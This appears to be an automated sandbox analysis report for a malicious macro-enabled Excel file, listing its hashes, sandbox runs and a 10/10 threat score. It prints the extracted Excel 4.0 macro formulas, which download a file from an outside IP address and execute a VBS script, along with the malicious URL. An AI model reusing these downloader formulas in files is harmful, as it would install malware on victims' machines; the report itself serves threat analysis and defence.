General
Target: cda018259ed8d767a8cdfc26af5e87ef
Size: 6KB
Sample: 231222-r8k8wadfgm
MD5: cda018259ed8d767a8cdfc26af5e87ef
SHA1: e0a40b056325ce3ad3dc90a17eb17c0640409bb2
SHA256: 17044a8914cea7bcfaa1ff271edefe5fb0d2b4c6b0c92563cb8be4c436b5bf24
SHA512: 377255d08df7f2310cc9787329862e85c093b9e3bea6800749466826fa6875cb0b16c75cd9d4d1c2a43b5888100021cda9de8a3bda94aa495e97171a7dfddec6
SSDEEP: 192:NDSzGuSgbrA2OmmfRn8UhHFBFYu5b98yuVqu+X:NRuxM2wd1FYYb98yuEL
Static task: static1
Behavioral task: behavioral1
  Sample: cda018259ed8d767a8cdfc26af5e87ef.xlsm
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: cda018259ed8d767a8cdfc26af5e87ef.xlsm
  Resource: win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Formulas:
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
Target: cda018259ed8d767a8cdfc26af5e87ef
Score: 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.